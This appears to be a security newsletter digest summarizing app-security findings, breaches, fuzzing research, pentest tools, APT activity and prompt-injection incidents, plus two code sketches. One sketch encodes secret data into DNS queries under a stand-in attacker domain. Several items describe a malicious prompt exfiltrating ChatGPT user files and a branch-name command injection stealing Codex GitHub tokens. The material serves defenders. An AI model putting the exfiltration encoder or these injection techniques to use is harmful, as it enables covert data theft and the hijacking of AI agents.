Attacks & Vulnerabilities

Security Analysis of the Official White House iOS App (8 minute read)
Researchers performing static analysis on the official White House iOS app uncovered eight critical security findings. Six WebViews execute live, unverified JavaScript from Elfsight, a widget company founded in Russia, via a two-stage loader that lets Elfsight's servers inject arbitrary scripts at runtime, with no Subresource Integrity checks and a ReactNativeWebView.postMessage() bridge to the native layer. The app also ships OneSignalLocation.framework with always-on background GPS collection, a provably false privacy manifest declaring zero data collection despite ten analytics frameworks in the binary, OneSignal remote parameters that can silently toggle location tracking without an app update, JavaScript that programmatically strips GDPR and cookie consent banners across all WebViews, and a dormant Expo OTA pipeline that, if enabled, would allow arbitrary JavaScript pushes to all devices, bypassing App Store review entirely. The app implements no certificate pinning, jailbreak detection, anti-tampering, or runtime integrity checks, leaving API traffic trivially interceptable via MITM on any shared network.

Stats SA Confirms Data Breach as Hackers Demand R1.7M Ransom (2 minute read)
Stats SA, South Africa's national statistics agency, confirmed that it suffered a data breach. The XP95 hacking group claimed responsibility and is demanding a R1.7M ($100K) ransom for the 154GB of data it stole. Stats SA stated that the breached system was an HR portal used by job-seekers to apply online and that it will not pay the ransom.

Hackers Now Exploit F5 BIG-IP Flaw in Attacks (2 minute read)
F5 Networks has reclassified a 2025 DoS vulnerability in its BIG-IP APM (Access Policy Manager) as a remote code execution vulnerability.
F5 warned that unauthenticated attackers can exploit the vulnerability and said it has observed exploitation in the wild. CISA has also added it to its Known Exploited Vulnerabilities (KEV) catalog.

On the Effectiveness of Mutational Grammar Fuzzing (8 minute read)
Google Project Zero's Ivan Fratric identifies two core weaknesses in coverage-guided grammar fuzzing: coverage metrics fail to reward the chained function call sequences needed to trigger complex bugs, and greedy corpus saving produces low-diversity sample sets that converge toward similar inputs. Fratric counters both issues with a periodic worker-restart strategy, in which each worker builds an independent corpus for T seconds before syncing with a shared server, alternating between generative and mutational phases. Experiments against libxslt showed that this approach uncovered up to 9 unique crashes, compared with 2-5 in continuous single-worker sessions, with T=3600 seconds proving optimal for that target.

AI Coding Tools in a Sandbox: Why Your File System Needs Protection (3 minute read)
AI coding tools like Claude Code, Copilot, and Cursor run with full user-level filesystem permissions, meaning a hallucinated path or misinterpreted command can expose SSH keys, credentials, and sensitive files outside the project directory. bx wraps any AI coding tool using macOS's kernel-level sandbox-exec to restrict filesystem visibility to the target project directory only, with a .bxignore file allowing per-project exclusion of .env files, certificates, and secrets even within the allowed path. Enforcement occurs in the OS kernel before any process can act, so the protection covers not just direct file operations but also MCP server calls, shell commands, and automated hooks that would otherwise execute with the user's full permissions.
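The periodic worker-restart strategy from the grammar-fuzzing item above can be sketched as a toy simulation. Everything below (the grammar, mutator, and coverage signal) is an illustrative placeholder, not Project Zero's implementation; only the epoch structure mirrors the described approach.

```python
import random
import time

def generate_from_grammar():
    # placeholder for grammar-based generation: a random token sequence
    return [random.choice("abc") for _ in range(4)]

def mutate(sample):
    # placeholder mutator: flip one token of a saved sample
    s = list(sample)
    s[random.randrange(len(s))] = random.choice("abc")
    return s

def run_target(sample, seen_coverage):
    # toy coverage signal: "new coverage" if this token multiset is unseen
    key = tuple(sorted(sample))
    if key not in seen_coverage:
        seen_coverage.add(key)
        return True
    return False

def worker_epoch(duration, seen_coverage):
    """One epoch: build an independent corpus for `duration` seconds,
    alternating generative and mutational phases, then return it for syncing."""
    corpus, generative = [], True
    deadline = time.time() + duration
    while time.time() < deadline:
        if generative or not corpus:
            sample = generate_from_grammar()
        else:
            sample = mutate(random.choice(corpus))
        if run_target(sample, seen_coverage):
            corpus.append(sample)      # greedy saving, but only within this epoch
        generative = not generative
    return corpus

# three worker restarts, each starting from a fresh local corpus;
# T is shrunk from 3600 s to 0.01 s so the demo finishes instantly
shared_corpus, seen = [], set()
for _ in range(3):
    shared_corpus.extend(worker_epoch(0.01, seen))
print(len(shared_corpus))
```

The restart is the point: because each epoch discards its local corpus after syncing, no single greedy corpus can dominate, which is what restores sample diversity in Fratric's experiments.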
Designing AI Agents to Resist Prompt Injection (5 minute read)
Prompt injection attacks have evolved to more closely resemble social engineering attempts, which makes them harder to distinguish from legitimate input. Some organizations are deploying AI firewalls that scan inputs to agents and classify them as benign or malicious. OpenAI developed Safe URL, a mitigation for cases where an agent is convinced to act maliciously by a prompt injection attack: it attempts to detect when information would be transmitted to a third party and prompts the user before proceeding.

vscode-frida (GitHub Repo)
A VSCode extension that brings a full Frida instrumentation workbench into the editor, featuring a sidebar process/app browser for local, USB, and remote devices; runtime panels for browsing native modules, ObjC classes, and Java methods with one-click hook generation; and an LSP server that provides context-aware autocomplete for Frida scripts against a live target process. It also includes Android tooling for automatic frida-server deployment and APK extraction, iOS SSH shell support, project scaffolding for TypeScript agents and C modules, and GitHub Copilot integration for AI-assisted native hook generation.

Inside AWS Security Agent: A multi-agent architecture for automated penetration testing (4 minute read)
AWS Security Agent, now in public preview, is a multi-agent penetration testing system that chains specialized agents across authentication, baseline scanning, managed execution, guided exploration, and assertion-based validation phases to autonomously discover and confirm vulnerabilities. Swarm worker agents are equipped with web fuzzers, code executors, and access to the NVD/CVE databases, while a guided exploration agent dynamically generates context-aware test plans that chain multi-step attacks, such as IDOR combined with authentication bypass.
On the CVE Bench v2.0 benchmark, the system achieved an 80% attack success rate under real-world conditions, without CTF instructions or grader feedback.

PrivHound (GitHub Repo)
PrivHound is a BloodHound collector for OpenGraph that models Windows local privilege escalation as interconnected attack paths. Unlike WinPEAS or PowerUp, PrivHound automatically chains multi-hop escalation paths, such as PSReadLine history containing credentials for a user with write access to a SYSTEM service binary, and overlays local privesc paths onto existing Active Directory attack graphs. Cross-user escalation analysis uses LogonUser and GetTokenInformation to evaluate what discovered credentials can access, without requiring SeImpersonatePrivilege.

Converging Interests: Analysis of Threat Clusters Targeting a Southeast Asian Government (12 minute read)
Unit 42 uncovered three simultaneous, China-aligned threat clusters targeting a Southeast Asian government between June and August 2025. Stately Taurus deployed the USBFect worm (aka HIUPAN) to propagate the PUBLOAD backdoor via removable media; CL-STA-1048 rotated through a noisy multi-RAT toolkit spanning EggStremeFuel, Masol RAT, EggStreme Loader, Gorem RAT, and the TrackBak infostealer in an apparent attempt to evade XDR detection; and CL-STA-1049 used a novel DLL sideloading chain called Hypnosis loader to quietly deliver FluffyGh0st RAT. TTP overlaps tie the clusters to Earth Estries, Unfading Sea Haze, and the Crimson Palace campaign, suggesting that distinct but aligned operators are coordinating against the same high-value network. Defenders should monitor for DLL sideloading against legitimate security vendor binaries, USB-propagated payloads masquerading under ProgramData\Intel paths, and C2 traffic to the listed IOCs.

Databricks pitches Lakewatch as a cheaper SIEM — but is it really? (3 minute read)
Databricks' Lakewatch is an open agentic SIEM built on the company's lakehouse architecture that charges for compute rather than ingestion, promising up to 80% TCO reduction and years of hot, queryable data for threat hunting and compliance. The platform integrates Unity Catalog, Lakeflow Connect, and OCSF normalization to centralize security operations and is backed by the acquisitions of Antimatter and SiftD.ai. Analysts caution that costs shift to compute rather than disappear, and near-term adoption will likely be limited to large enterprises already invested in the Databricks ecosystem.

OpenAI Patches ChatGPT Data Exfiltration Flaw and Codex GitHub Token Vulnerability (4 minute read)
Check Point found a flaw in ChatGPT that let a malicious prompt silently exfiltrate user messages and uploaded files via a hidden DNS channel in the Linux runtime; Custom GPTs could embed the attack with no user interaction required. Separately, BeyondTrust found a command injection bug in OpenAI Codex: injecting commands via a crafted GitHub branch name could steal GitHub tokens and grant read/write access to the victim's full codebase. Both flaws have been fixed.
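Hidden DNS channels like the one in the ChatGPT item above work because even egress-filtered environments usually let the local resolver forward lookups for arbitrary names to a zone's authoritative server. A minimal sketch of the encoding side, assuming a hypothetical attacker-controlled zone ("attacker.example"); this only builds query names and performs no network I/O:

```python
import binascii

MAX_LABEL = 63  # RFC 1035 limits each DNS label to 63 bytes

def to_dns_queries(secret: bytes, zone: str = "attacker.example"):
    """Hex-encode data and split it into DNS labels under an
    attacker-controlled zone (names here are illustrative)."""
    encoded = binascii.hexlify(secret).decode()
    chunks = [encoded[i:i + MAX_LABEL]
              for i in range(0, len(encoded), MAX_LABEL)]
    # each chunk becomes a lookup that resolvers dutifully forward to the
    # zone's nameserver, where the receiving side reassembles the sequence
    return [f"{i}.{chunk}.{zone}" for i, chunk in enumerate(chunks)]

queries = to_dns_queries(b"user message contents")
print(queries[0])
```

Because the exfiltrated bytes travel as ordinary recursive DNS lookups rather than HTTP requests, URL allowlists and proxy inspection never see them, which is why sandboxed runtimes need DNS egress controls as well.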